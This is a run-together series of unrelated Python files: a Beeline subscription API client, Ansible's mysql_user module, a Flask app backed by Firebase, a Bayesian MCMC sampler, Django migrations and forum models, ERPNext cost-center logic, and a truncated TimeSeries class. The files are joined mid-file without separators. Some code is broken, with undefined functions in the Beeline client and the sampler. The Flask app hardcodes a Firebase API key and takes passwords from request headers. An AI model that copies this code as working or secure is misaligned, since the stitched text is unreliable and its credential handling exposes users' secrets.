r'(BUILD=)(\d+)', 'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.)(\d+)', } IncrementVersions(replacements) else: print '--type is a required argument and has not been specified. Exiting.' return 1 return 0 if __name__ == '__main__': sys.exit(Main())
import requests LOGIN = '' PASSWORD = '' is_stub = True def get_beeline_token(): """ По логину и паролю по api beeline получаем токен билайна пример токена 51BF96B928C8C71124BE61C1BF787B23 """ url = '=%s' % (LOGIN, PASSWORD) res = requests.get(url) try: res = res.json() if res['meta']['code'] == 20000: beeline_token = res['token'] return beeline_token, "" else: return None, res['meta']['message'] except Exception: return None, "Error_%s" % res.status_code def get_subscriptions(ctn): bt, _ = get_beeline_token() if is_stub: url = '' else: url = '=%s' % ctn cookies = {'token': bt} response = requests.get(url, cookies=cookies) try: response = response.json() if response.get('meta').get('code') == 20000: subscribes_list = response.get('subscriptions') if len(subscribes_list) == 0: result = "Подписок нет" return result, None else: result = subscribes_list return result, None else: result = response.get('meta').get('message') return None, result except Exception: return None, "Error_%s" % response.status_code # https://my.beeline.ru/api/1.0/info/serviceAvailableList?ctn=9060447044 def get_available_subscriptions(): pass def remove_subscriptions(ctn, subscription_id): bt, _ = get_beeline_token() if is_stub: url = '' % subscription_id else: url = '={}&subscriptionId={}'.format(ctn, subscription_id) cookies = {'token': bt} response = requests.get(url, cookies=cookies) response = response.json() if response.get('meta').get('code') == 20000: result = 'Скоро отключим, обновите страницу' else: result = response.get('meta').get('message') return result if __name__ == '__main__': login = '' password = '' ctn = '' token = get_token(login, password) user_info = get_personal_info(token, login, ctn) print(user_info)
#!/usr/bin/python # (c) 2012, Mark Theunissen <[email protected]> # Sponsored by Four Kitchens http://fourkitchens.com. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: mysql_user short_description: Adds or removes a user from a MySQL database. description: - Adds or removes a user from a MySQL database. version_added: "0.6" options: name: description: - name of the user (role) to add or remove required: true password: description: - set the user's password. (Required when adding a user) required: false default: null host: description: - the 'host' part of the MySQL username required: false default: localhost login_user: description: - The username used to authenticate with required: false default: null login_password: description: - The password used to authenticate with required: false default: null login_host: description: - Host running the database required: false default: localhost login_port: description: - Port of the MySQL server required: false default: 3306 version_added: '1.4' login_unix_socket: description: - The path to a Unix domain socket for local connections required: false default: null priv: description: - "MySQL privileges string in the format: C(db.table:priv1,priv2)" required: false default: null append_privs: description: - Append the privileges defined by priv to the existing ones for this user instead of overwriting existing ones. required: false choices: [ "yes", "no" ] default: "no" version_added: "1.4" state: description: - Whether the user should exist. When C(absent), removes the user. required: false default: present choices: [ "present", "absent" ] check_implicit_admin: description: - Check if mysql allows login as root/nopassword before trying supplied credentials. required: false choices: [ "yes", "no" ] default: "no" version_added: "1.3" update_password: required: false default: always choices: ['always', 'on_create'] version_added: "2.0" description: - C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users. config_file: description: - Specify a config file from which user and password are to be read required: false default: '~/.my.cnf' version_added: "2.0" notes: - Requires the MySQLdb Python package on the remote host. For Ubuntu, this is as easy as apt-get install python-mysqldb. - Both C(login_password) and C(login_user) are required when you are passing credentials. If none are present, the module will attempt to read the credentials from C(~/.my.cnf), and finally fall back to using the MySQL default login of 'root' with no password. - "MySQL server installs with default login_user of 'root' and no password. To secure this user as part of an idempotent playbook, you must create at least two tasks: the first must change the root user's password, without providing any login_user/login_password details. The second must drop a ~/.my.cnf file containing the new root credentials. Subsequent runs of the playbook will then succeed by reading the new credentials from the file." requirements: [ "MySQLdb" ] author: "Mark Theunissen (@marktheunissen)" ''' EXAMPLES = """ # Create database user with name 'bob' and password '12345' with all database privileges - mysql_user: name=bob password=12345 priv=*.*:ALL state=present # Creates database user 'bob' and password '12345' with all database privileges and 'WITH GRANT OPTION' - mysql_user: name=bob password=12345 priv=*.*:ALL,GRANT state=present # Modify user Bob to require SSL connections. Note that REQUIRESSL is a special privilege that should only apply to *.* by itself. - mysql_user: name=bob append_privs=true priv=*.*:REQUIRESSL state=present # Ensure no user named 'sally' exists, also passing in the auth credentials. - mysql_user: login_user=root login_password=123456 name=sally state=absent # Specify grants composed of more than one word - mysql_user: name=replication password=12345 priv=*.*:"REPLICATION CLIENT" state=present # Revoke all privileges for user 'bob' and password '12345' - mysql_user: name=bob password=12345 priv=*.*:USAGE state=present # Example privileges string format mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanotherdb.*:ALL # Example using login_unix_socket to connect to server - mysql_user: name=root password=abc123 login_unix_socket=/var/run/mysqld/mysqld.sock # Example .my.cnf file for setting the root password [client] user=root password=n<_665{vS43y """ import getpass import tempfile import re try: import MySQLdb except ImportError: mysqldb_found = False else: mysqldb_found = True VALID_PRIVS = frozenset(('CREATE', 'DROP', 'GRANT', 'GRANT OPTION', 'LOCK TABLES', 'REFERENCES', 'EVENT', 'ALTER', 'DELETE', 'INDEX', 'INSERT', 'SELECT', 'UPDATE', 'CREATE TEMPORARY TABLES', 'TRIGGER', 'CREATE VIEW', 'SHOW VIEW', 'ALTER ROUTINE', 'CREATE ROUTINE', 'EXECUTE', 'FILE', 'CREATE TABLESPACE', 'CREATE USER', 'PROCESS', 'PROXY', 'RELOAD', 'REPLICATION CLIENT', 'REPLICATION SLAVE', 'SHOW DATABASES', 'SHUTDOWN', 'SUPER', 'ALL', 'ALL PRIVILEGES', 'USAGE', 'REQUIRESSL')) class InvalidPrivsError(Exception): pass # =========================================== # MySQL module specific support methods. # def connect(module, login_user=None, login_password=None, config_file=''): config = { 'host': module.params['login_host'], 'db': 'mysql' } if module.params['login_unix_socket']: config['unix_socket'] = module.params['login_unix_socket'] else: config['port'] = module.params['login_port'] if os.path.exists(config_file): config['read_default_file'] = config_file # If login_user or login_password are given, they should override the # config file if login_user is not None: config['user'] = login_user if login_password is not None: config['passwd'] = login_password db_connection = MySQLdb.connect(**config) return db_connection.cursor() def user_exists(cursor, user, host): cursor.execute("SELECT count(*) FROM user WHERE user = %s AND host = %s", (user,host)) count = cursor.fetchone() return count[0] > 0 def user_add(cursor, user, host, password, new_priv): cursor.execute("CREATE USER %s@%s IDENTIFIED BY %s", (user,host,password)) if new_priv is not None: for db_table, priv in new_priv.iteritems(): privileges_grant(cursor, user,host,db_table,priv) return True def user_mod(cursor, user, host, password, new_priv, append_privs): changed = False grant_option = False # Handle passwords if password is not None: cursor.execute("SELECT password FROM user WHERE user = %s AND host = %s", (user,host)) current_pass_hash = cursor.fetchone() cursor.execute("SELECT PASSWORD(%s)", (password,)) new_pass_hash = cursor.fetchone() if current_pass_hash[0] != new_pass_hash[0]: cursor.execute("SET PASSWORD FOR %s@%s = PASSWORD(%s)", (user,host,password)) changed = True # Handle privileges if new_priv is not None: curr_priv = privileges_get(cursor, user,host) # If the user has privileges on a db.table that doesn't appear at all in # the new specification, then revoke all privileges on it. for db_table, priv in curr_priv.iteritems(): # If the user has the GRANT OPTION on a db.table, revoke it first. if "GRANT" in priv: grant_option = True if db_table not in new_priv: if user != "root" and "PROXY" not in priv and not append_privs: privileges_revoke(cursor, user,host,db_table,priv,grant_option) changed = True # If the user doesn't currently have any privileges on a db.table, then # we can perform a straight grant operation. for db_table, priv in new_priv.iteritems(): if db_table not in curr_priv: privileges_grant(cursor, user,host,db_table,priv) changed = True # If the db.table specification exists in both the user's current privileges # and in the new privileges, then we need to see if there's a difference. db_table_intersect = set(new_priv.keys()) & set(curr_priv.keys()) for db_table in db_table_intersect: priv_diff = set(new_priv[db_table]) ^ set(curr_priv[db_table]) if (len(priv_diff) > 0): if not append_privs: privileges_revoke(cursor, user,host,db_table,curr_priv[db_table],grant_option) privileges_grant(cursor, user,host,db_table,new_priv[db_table]) changed = True return changed def user_delete(cursor, user, host): cursor.execute("DROP USER %s@%s", (user, host)) return True def privileges_get(cursor, user,host): """ MySQL doesn't have a better method of getting privileges aside from the SHOW GRANTS query syntax, which requires us to then parse the returned string. Here's an example of the string that is returned from MySQL: GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY 'pass'; This function makes the query and returns a dictionary containing the results. The dictionary format is the same as that returned by privileges_unpack() below. """ output = {} cursor.execute("SHOW GRANTS FOR %s@%s", (user, host)) grants = cursor.fetchall() def pick(x): if x == 'ALL PRIVILEGES': return 'ALL' else: return x for grant in grants: res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant[0]) if res is None: raise InvalidPrivsError('unable to parse the MySQL grant string: %s' % grant[0]) privileges = res.group(1).split(", ") privileges = [ pick(x) for x in privileges] if "WITH GRANT OPTION" in res.group(4): privileges.append('GRANT') if "REQUIRE SSL" in res.group(4): privileges.append('REQUIRESSL') db = res.group(2) output[db] = privileges return output def privileges_unpack(priv): """ Take a privileges string, typically passed as a parameter, and unserialize it into a dictionary, the same format as privileges_get() above. We have this custom format to avoid using YAML/JSON strings inside YAML playbooks. Example of a privileges string: mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanother.*:ALL The privilege USAGE stands for no privileges, so we add that in on *.* if it's not specified in the string, as MySQL will always provide this by default. """ output = {} privs = [] for item in priv.strip().split('/'): pieces = item.strip().split(':') dbpriv = pieces[0].rsplit(".", 1) # Do not escape if privilege is for database '*' (all databases) if dbpriv[0].strip('`') != '*': pieces[0] = "`%s`.%s" % (dbpriv[0].strip('`'), dbpriv[1]) if '(' in pieces[1]: output[pieces[0]] = re.split(r',\s*(?=[^)]*(?:\(|$))', pieces[1].upper()) for i in output[pieces[0]]: privs.append(re.sub(r'\(.*\)','',i)) else: output[pieces[0]] = pieces[1].upper().split(',') privs = output[pieces[0]] new_privs = frozenset(privs) if not new_privs.issubset(VALID_PRIVS): raise InvalidPrivsError('Invalid privileges specified: %s' % new_privs.difference(VALID_PRIVS)) if '*.*' not in output: output['*.*'] = ['USAGE'] # if we are only specifying something like REQUIRESSL in *.* we still need # to add USAGE as a privilege to avoid syntax errors if priv.find('REQUIRESSL') != -1 and 'USAGE' not in output['*.*']: output['*.*'].append('USAGE') return output def privileges_revoke(cursor, user,host,db_table,priv,grant_option): # Escape '%' since mysql db.execute() uses a format string db_table = db_table.replace('%', '%%') if grant_option: query = ["REVOKE GRANT OPTION ON %s" % mysql_quote_identifier(db_table, 'table')] query.append("FROM %s@%s") query = ' '.join(query) cursor.execute(query, (user, host)) priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')]) query = ["REVOKE %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))] query.append("FROM %s@%s") query = ' '.join(query) cursor.execute(query, (user, host)) def privileges_grant(cursor, user,host,db_table,priv): # Escape '%' since mysql db.execute uses a format string and the # specification of db and table often use a % (SQL wildcard) db_table = db_table.replace('%', '%%') priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')]) query = ["GRANT %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))] query.append("TO %s@%s") if 'GRANT' in priv: query.append("WITH GRANT OPTION") if 'REQUIRESSL' in priv: query.append("REQUIRE SSL") query = ' '.join(query) cursor.execute(query, (user, host)) # =========================================== # Module execution. # def main(): module = AnsibleModule( argument_spec = dict( login_user=dict(default=None), login_password=dict(default=None), login_host=dict(default="localhost"), login_port=dict(default=3306, type='int'), login_unix_socket=dict(default=None), user=dict(required=True, aliases=['name']), password=dict(default=None, no_log=True), host=dict(default="localhost"), state=dict(default="present", choices=["absent", "present"]), priv=dict(default=None), append_privs=dict(default=False, type='bool'), check_implicit_admin=dict(default=False, type='bool'), update_password=dict(default="always", choices=["always", "on_create"]), config_file=dict(default="~/.my.cnf"), ) ) login_user = module.params["login_user"] login_password = module.params["login_password"] user = module.params["user"] password = module.params["password"] host = module.params["host"].lower() state = module.params["state"] priv = module.params["priv"] check_implicit_admin = module.params['check_implicit_admin'] config_file = module.params['config_file'] append_privs = module.boolean(module.params["append_privs"]) update_password = module.params['update_password'] config_file = os.path.expanduser(os.path.expandvars(config_file)) if not mysqldb_found: module.fail_json(msg="the python mysqldb module is required") if priv is not None: try: priv = privileges_unpack(priv) except Exception, e: module.fail_json(msg="invalid privileges string: %s" % str(e)) cursor = None try: if check_implicit_admin: try: cursor = connect(module, 'root', '', config_file) except: pass if not cursor: cursor = connect(module, login_user, login_password, config_file) except Exception, e: module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or ~/.my.cnf has the credentials. Exception message: %s" % e) if state == "present": if user_exists(cursor, user, host): try: if update_password == 'always': changed = user_mod(cursor, user, host, password, priv, append_privs) else: changed = user_mod(cursor, user, host, None, priv, append_privs) except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e: module.fail_json(msg=str(e)) else: if password is None: module.fail_json(msg="password parameter required when adding a user") try: changed = user_add(cursor, user, host, password, priv) except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e: module.fail_json(msg=str(e)) elif state == "absent": if user_exists(cursor, user, host): changed = user_delete(cursor, user, host) else: changed = False module.exit_json(changed=changed, user=user) # import module snippets from ansible.module_utils.basic import * from ansible.module_utils.database import * if __name__ == '__main__': main()
from flask import Flask from flask import request from flask import jsonify import pyrebase app = Flask(__name__) config = { "apiKey": "AIzaSyBXZpwPptJjUJddDl6Q0DpG_3k7mGDdHk8", "authDomain": "my-first-project-fea9c.firebaseapp.com", "databaseURL": "https://my-first-project-fea9c.firebaseio.com/", "storageBucket": "my-first-project-fea9c.appspot.com" } firebase = pyrebase.initialize_app(config) @app.route('/') def hello_world(): return 'Hello, World!' @app.route('/createuser') def create_user(): username = request.headers.get('email') password = request.headers.get('password') auth = firebase.auth() auth.create_user_with_email_and_password(username, password) @app.route('/login') def login(): username = request.headers.get('email') password = request.headers.get('password') auth = firebase.auth() auth.sign_in_with_email_and_password(username, password) @app.route('/createlist') def create_list(): owner = request.headers.get('owner') list_name = request.headers.get('name') db = firebase.database() list_data = { 'owner': owner, 'name': list_name } resp = db.child("lists").push(list_data) return resp["name"] @app.route('/list') def get_list(): list_id = request.headers.get('listID') db = firebase.database() data = db.child('lists').child(list_id).get() return jsonify(data.val())
import numpy as np def sample_distparams(F,dist_struct,hyperparams,hyperhyperparams,num_iters): #function [hyperparams] = sample_distparams(F,dist_struct,hyperparams,hyperhyperparams,num_iters) numObj = len(dist_struct) Ki = np.zeros((1,numObj)) sum_log_pi_kk = np.zeros((1,numObj)) sum_log_pi_all = np.zeros((1,numObj)) for ii in range(len(dist_struct)): Ki[ii] = np.sum(F[ii,:]) pi_z_ii = dist_struct[ii].pi_z(F[ii,:],F[ii,:]) pi_z_ii = pi_z_ii/np.tile(np.sum(pi_z_ii,axis=1),(1,pi_z_ii.shape[1])) sum_log_pi_kk[ii] = np.sum(np.log(np.linalg.diag(pi_z_ii))) sum_log_pi_all[ii] = np.sum(np.log(pi_z_ii)) # Hyperparameters for prior on kappa: a_kappa = hyperhyperparams.a_kappa b_kappa = hyperhyperparams.b_kappa # Variance of gamma proposal: var_kappa = hyperhyperparams.var_kappa # Hyperparameters for prior on alpha: a_alpha = hyperhyperparams.a_alpha b_alpha = hyperhyperparams.b_alpha # Variance of gamma proposal: var_alpha = hyperhyperparams.var_alpha # Last value of alpha and kappa: alpha0 = hyperparams.alpha0 kappa0 = hyperparams.kappa0 for nn in range(num_iters): ####### Sample kappa given alpha ####### # (a,b) hyperparameters of gamma prior based on fixed variance and setting # mean equal to previous kappa value: aa_kappa0 = (kappa0**2)/var_kappa bb_kappa0 = kappa0/var_kappa # Sample a proposed kappa: kappa = randgamma(aa_kappa0) / bb_kappa0 # Determine log-likelihood of transition distributions given previous kappa # value and proposed kappa value: log_diff_f = 0 for ii in range(len(dist_struct)): log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha0*Ki[ii]+kappa)-gammaln(alpha0*Ki[ii]+kappa0)) \ - Ki[ii]*(gammaln(alpha0+kappa)-gammaln(alpha0+kappa0)) + (kappa-kappa0)*sum_log_pi_kk[ii] # Add in prior probability of previous and proposed kappa values: log_diff_f = log_diff_f + (a_kappa-1)*(np.log(kappa)-np.log(kappa0))-(kappa-kappa0)*b_kappa # (a,b) hyperparameters of gamma prior based on fixed variance and setting # mean equal to proposed kappa value: aa_kappa = (kappa**2)/var_kappa bb_kappa = kappa/var_kappa # Log accept-reject ratio: log_rho = log_diff_f + (gammaln(aa_kappa0) - gammaln(aa_kappa)) \ + (aa_kappa-aa_kappa0-1)*np.log(kappa0) - (aa_kappa0-aa_kappa-1)*np.log(kappa) \ + (aa_kappa0-aa_kappa)*np.log(var_kappa) if isinf(log_rho): log_rho = -np.inf rho = np.exp(log_rho) if rho > 1: kappa0 = kappa else: sample_set = [kappa0, kappa] ind = 1 + (np.random.rand() > (1-rho) ) kappa0 = sample_set[ind] ####### Sample alpha given kappa ####### # (a,b) hyperparameters of gamma prior based on fixed variance and setting # mean equal to previous alpha value: aa_alpha0 = (alpha0**2)/var_alpha bb_alpha0 = alpha0/var_alpha # Sample a proposed alpha: alpha = randgamma(aa_alpha0) / bb_alpha0 # Determine log-likelihood of transition distributions given previous alpha # value and proposed alpha value: log_diff_f = 0 for ii in range(len(dist_struct)): log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha*Ki[ii]+kappa0)-gammaln(alpha0*Ki[ii]+kappa0)) \ - Ki[ii]*(gammaln(alpha+kappa0)-gammaln(alpha0+kappa0)) \ - Ki[ii]*(Ki[ii]-1)*(gammaln(alpha)-gammaln(alpha0)) \ + (alpha-alpha0)*sum_log_pi_all[ii] # Add in prior probability of previous and proposed alpha values: log_diff_f = log_diff_f + (a_alpha-1)*(np.log(alpha)-np.log(alpha0))-(alpha-alpha0)*b_alpha # (a,b) hyperparameters of gamma prior based on fixed variance and setting # mean equal to proposed kappa value: aa_alpha = (alpha**2)/var_alpha bb_alpha = alpha/var_alpha # Log accept-reject ratio: log_rho = log_diff_f + (gammaln(aa_alpha0) - gammaln(aa_alpha)) \ + (aa_alpha-aa_alpha0-1)*np.log(alpha0) - (aa_alpha0-aa_alpha-1)*np.log(alpha) \ + (aa_alpha0-aa_alpha)*np.log(var_alpha) if np.isinf(log_rho): log_rho = np.inf rho = np.exp(log_rho) if rho > 1: alpha0 = alpha else: sample_set = [alpha0, alpha] ind = 1+(np.random.rand() > (1-rho) ) alpha0 = sample_set[ind] # Write final values: hyperparams.alpha0 = alpha0 hyperparams.kappa0 = kappa0 return hyperparams
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('taxbrain', '0013_auto_20141021_1346'), ] operations = [ migrations.CreateModel( name='AdjustmentsInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='AlternativeMinimumInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='CreditsInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='GrossIncomeInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='IncomeRatesInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='ItemizedDeductionsInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='SocialSecurityInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='StandardDeductionsInputs', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ], options={ }, bases=(models.Model,), ), migrations.RenameModel( old_name='TaxSaveInputs', new_name='PersonalExemptionsInputs', ), ]
from __future__ import print_function import time import random import ztreamy import tornado.ioloop # Create a server with two streams server = ztreamy.StreamServer(9000) # Create the streams; stream1 allows remote producers to publish through HTTP stream1 = ztreamy.Stream('/stream1', allow_publish=True) stream2 = ztreamy.Stream('/stream2') server.add_stream(stream1) server.add_stream(stream2) # Create two publisher objects publisher1 = ztreamy.LocalEventPublisher(stream1) publisher2 = ztreamy.LocalEventPublisher(stream2) source_id = ztreamy.random_id() application_ids = ['ztreamy-example-a', 'ztreamy-example-b'] # Publish events periodically def publish_hi(): print('Publishing "hi"') app_id = random.choice(application_ids) event = ztreamy.Event(source_id, 'text/plain', 'Hi', application_id=app_id) publisher1.publish(event) def publish_there(): print('Publishing "there"') app_id = random.choice(application_ids) event = ztreamy.Event(source_id, 'text/plain', 'there!', application_id=app_id) publisher2.publish(event) tornado.ioloop.PeriodicCallback(publish_hi, 10000).start() time.sleep(5) tornado.ioloop.PeriodicCallback(publish_there, 10000).start() try: print('Starting the server') server.start(loop=True) except KeyboardInterrupt: # Allow ctrl-c to close the server pass finally: server.stop()
# -*- coding: utf-8 -*- from __future__ import unicode_literals from autoslug import AutoSlugField from django.db import models from django.db.models import F from django.utils.translation import ugettext_lazy as _ from django.core.urlresolvers import reverse from django.conf import settings from django.utils import timezone from .config import COMMENT_ACTION, COMMENT class Category(models.Model): """ Category model """ parent = models.ForeignKey('self', verbose_name=_("category parent"), blank=True, null=True) title = models.CharField(_("title"), max_length=75) slug = AutoSlugField(populate_from="title", blank=True, unique=True) description = models.CharField(_("description"), max_length=255, blank=True) color = models.CharField(_("color"), max_length=7, blank=True, help_text=_("Title color in hex format (i.e: #1aafd0).")) is_global = models.BooleanField(_("global"), default=True, help_text=_('Designates whether the topics will be' 'displayed in the all-categories list.')) is_closed = models.BooleanField(_("closed"), default=False) is_removed = models.BooleanField(_("removed"), default=False) is_private = models.BooleanField(_("private"), default=False) class Meta: ordering = ['-pk'] verbose_name = _("category") verbose_name_plural = _("categories") def __unicode__(self): return self.title.encode('utf-8') def get_absolute_url(self): return reverse( 'drf_spirit:category-detail', kwargs={'pk': str(self.id), 'slug': self.slug}) @property def is_subcategory(self): if self.parent_id: return True else: return False class Topic(models.Model): """ Topic model """ user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='spirit_topics', editable=False) category = models.ForeignKey(Category, verbose_name=_("category")) title = models.CharField(_("title"), max_length=255) description = models.TextField(_("description"), default=_("No descriptions"), blank=True) slug = AutoSlugField(populate_from="title", blank=True, unique=True) date = models.DateTimeField(_("date"), default=timezone.now, blank=True, editable=False) last_active = models.DateTimeField(_("last active"), default=timezone.now, blank=True, editable=False) is_pinned = models.BooleanField(_("pinned"), default=False) is_globally_pinned = models.BooleanField(_("globally pinned"), default=False, editable=False) is_closed = models.BooleanField(_("closed"), default=False) is_removed = models.BooleanField(default=False) is_archived = models.BooleanField(default=False) view_count = models.PositiveIntegerField(_("views count"), default=0, editable=False) comment_count = models.PositiveIntegerField(_("comment count"), default=0, editable=False) class Meta: ordering = ['-last_active', '-pk'] verbose_name = _("topic") verbose_name_plural = _("topics") def __unicode__(self): return self.title.encode('utf-8') def get_absolute_url(self): return reverse('drf_spirit:topic-detail', kwargs={'pk': str(self.id), 'slug': self.slug}) @property def main_category(self): return self.category.parent or self.category def increase_view_count(self): Topic.objects.filter(pk=self.pk).update(view_count=F('view_count') + 1) def increase_comment_count(self): Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') + 1, last_active=timezone.now()) def decrease_comment_count(self): # todo: update last_active to last() comment Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') - 1) class Comment(models.Model): user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='forum_comments', editable=False) topic = models.ForeignKey(Topic, related_name='comments') comment = models.TextField(_("comment")) action = models.IntegerField(_("action"), choices=COMMENT_ACTION, default=COMMENT) date = models.DateTimeField(default=timezone.now, blank=True, editable=False) is_removed = models.BooleanField(default=False) is_modified = models.BooleanField(default=False, editable=False) ip_address = models.GenericIPAddressField(blank=True, null=True, editable=False) modified_count = models.PositiveIntegerField(_("modified count"), default=0, editable=False) likes_count = models.PositiveIntegerField(_("likes count"), default=0, editable=False) class Meta: ordering = ['-date', '-pk'] verbose_name = _("comment") verbose_name_plural = _("comments") def __unicode__(self): return self.comment[:10].encode('utf-8') def increase_modified_count(self): Comment.objects.filter(pk=self.pk).update(modified_count=F('modified_count') + 1) def increase_likes_count(self): Comment.objects.filter(pk=self.pk).update(likes_count=F('likes_count') + 1) def decrease_likes_count(self): (Comment.objects.filter(pk=self.pk, likes_count__gt=0) .update(likes_count=F('likes_count') - 1)) def save(self, *args, **kwargs): # Comment has pk, means the comment is modified. So increase modified_count and change is_modified if self.pk: self.is_modified = True self.modified_count = F('modified_count') + 1 super(Comment, self).save(*args, **kwargs) if self.pk: # comment has pk means modified_count is changed. # As we use F expression, its not possible to know modified_count until refresh from db self.refresh_from_db()
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe import _ from frappe.utils import cint, cstr from frappe.utils.nestedset import NestedSet class CostCenter(NestedSet): nsm_parent_field = 'parent_cost_center' def autoname(self): self.name = self.cost_center_name.strip() + ' - ' + \ frappe.db.get_value("Company", self.company, "abbr") def validate(self): self.validate_mandatory() def validate_mandatory(self): if self.cost_center_name != self.company and not self.parent_cost_center: frappe.throw(_("Please enter parent cost center")) elif self.cost_center_name == self.company and self.parent_cost_center: frappe.throw(_("Root cannot have a parent cost center")) def convert_group_to_ledger(self): if self.check_if_child_exists(): frappe.throw(_("Cannot convert Cost Center to ledger as it has child nodes")) elif self.check_gle_exists(): frappe.throw(_("Cost Center with existing transactions can not be converted to ledger")) else: self.is_group = 0 self.save() return 1 def convert_ledger_to_group(self): if self.check_gle_exists(): frappe.throw(_("Cost Center with existing transactions can not be converted to group")) else: self.is_group = 1 self.save() return 1 def check_gle_exists(self): return frappe.db.get_value("GL Entry", {"cost_center": self.name}) def check_if_child_exists(self): return frappe.db.sql("select name from `tabCost Center` where \ parent_cost_center = %s and docstatus != 2", self.name) def before_rename(self, olddn, newdn, merge=False): # Add company abbr if not provided from erpnext.setup.doctype.company.company import get_name_with_abbr new_cost_center = get_name_with_abbr(newdn, self.company) # Validate properties before merging super(CostCenter, self).before_rename(olddn, new_cost_center, merge, "is_group") return new_cost_center def after_rename(self, olddn, newdn, merge=False): super(CostCenter, self).after_rename(olddn, newdn, merge) if not merge: new_cost_center = frappe.db.get_value("Cost Center", newdn, ["cost_center_name", "cost_center_number"], as_dict=1) # exclude company abbr new_parts = newdn.split(" - ")[:-1] # update cost center number and remove from parts if new_parts[0][0].isdigit(): if len(new_parts) == 1: new_parts = newdn.split(" ") if new_cost_center.cost_center_number != new_parts[0]: validate_field_number("Cost Center", self.name, new_parts[0], self.company, "cost_center_number") self.cost_center_number = new_parts[0] self.db_set("cost_center_number", new_parts[0]) new_parts = new_parts[1:] # update cost center name cost_center_name = " - ".join(new_parts) if new_cost_center.cost_center_name != cost_center_name: self.cost_center_name = cost_center_name self.db_set("cost_center_name", cost_center_name) def on_doctype_update(): frappe.db.add_index("Cost Center", ["lft", "rgt"]) def get_doc_name_autoname(field_value, doc_title, name, company): if company: name_split=name.split("-") parts = [doc_title.strip(), name_split[len(name_split)-1].strip()] else: parts = [doc_title.strip()] if cstr(field_value).strip(): parts.insert(0, cstr(field_value).strip()) return ' - '.join(parts) def validate_field_number(doctype_name, name, field_value, company, field_name): if field_value: if company: doctype_with_same_number = frappe.db.get_value(doctype_name, {field_name: field_value, "company": company, "name": ["!=", name]}) else: doctype_with_same_number = frappe.db.get_value(doctype_name, {field_name: field_value, "name": ["!=", name]}) if doctype_with_same_number: frappe.throw(_("{0} Number {1} already used in account {2}") .format(doctype_name, field_value, doctype_with_same_number)) @frappe.whitelist() def update_number_field(doctype_name, name, field_name, field_value, company): doc_title = frappe.db.get_value(doctype_name, name, frappe.scrub(doctype_name)+"_name") validate_field_number(doctype_name, name, field_value, company, field_name) frappe.db.set_value(doctype_name, name, field_name, field_value) if doc_title[0].isdigit(): separator = " - " if " - " in doc_title else " " doc_title = doc_title.split(separator, 1)[1] frappe.db.set_value(doctype_name, name, frappe.scrub(doctype_name)+"_name", doc_title) new_name = get_doc_name_autoname(field_value, doc_title, name, company) if name != new_name: frappe.rename_doc(doctype_name, name, new_name) return new_name
#!/usr/bin/env python3 import numpy as np import math import numbers import datetime import sys from .helpers import * from .interfaces import * class TimeSeries(SizedContainerTimeSeriesInterface): def __init__(self, time_points, data_points): '''Implements the SizedContainerTimeSeriesInterface using Python lists for storage. Args: `time_points` (sequence): A sequence of time points. Must have length equal to `data_points.` `data_points` (sequence): A sequence of data points. Must have length equal to `time_points.` Returns: TimeSeries: A time series containing time and data points.''' super().__init__(time_points, data_points) self._times = list(time_points) self._data = list(data_points) def __len__(self): '''The length of the time series. Returns: int: The number of elements in the time series.''' return len(self._times) def __iter__(self): '''An iterable over the data points of the time series. Returns: iterable: An iterable over the data points of the time series.''' return iter(self._data) def itertimes(self): '''Returns an iterator over the TimeSeries times''' return iter(self._times) def __sizeof__(self): '''Returns the size in bytes of the time series storage.''' return sys.getsizeof(self.time_points) + sys.getsizeof(self.data_points) class ArrayTimeSeries(TimeSeries): def __init__(self, 